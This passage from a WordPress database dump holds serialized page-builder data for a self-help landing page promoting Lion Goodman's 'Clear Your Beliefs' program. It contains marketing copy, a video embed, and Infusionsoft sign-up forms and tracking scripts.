src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:873:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style=" margin-top: -32px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -25px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -48px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:611:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]<div style="height: auto; width: 100%;"><img style="top:-10px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png"></div>\n<p style="text-align: center; margin-top: 18px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1289, 1749, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:292:"<center>\n<div class="video-shadow">\n<div class="embed-responsive embed-responsive-16by9">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="560" height="315" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen></iframe></iframe>\n</div>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1382:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:873:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style=" margin-top: -32px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -25px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -48px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:611:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]<div style="height: auto; width: 100%;"><img style="top:-10px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png"></div>\n<p style="text-align: center; margin-top: 18px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1291, 1751, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:292:"<center>\n<div class="video-shadow">\n<div class="embed-responsive embed-responsive-16by9">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="560" height="315" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen></iframe></iframe>\n</div>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1382:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1898:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style=" margin-top: -32px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" class="infusion-form" method="POST">\n    <input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" />\n    <input name="inf_form_name" type="hidden" value="Click &#a;Download iPAD APP" />\n    <input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n    <div class="infusion-submit">\n        <input type="submit" value="DOWNLOAD iPAD APP" />\n    </div>\n</form>\n<script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n\n<form accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" class="infusion-form" method="POST">\n    <input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" />\n    <input name="inf_form_name" type="hidden" value="Click &#a;Download iphone APP" />\n    <input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n    <div class="infusion-submit">\n        <input type="submit" value="DOWNLOAD iPHONE APP" />\n    </div>\n</form>\n<script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1106:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="top:-10px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png"></div>\n<p style="text-align: center; margin-top: 18px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<form accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" class="infusion-form" method="POST">\n    <input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" />\n    <input name="inf_form_name" type="hidden" value="Click IClearit&#a;&quot;Learn More&quot;" />\n    <input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n    <div class="infusion-submit">\n        <input type="submit" value="LEARN MORE" />\n    </div>\n</form>\n<script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion 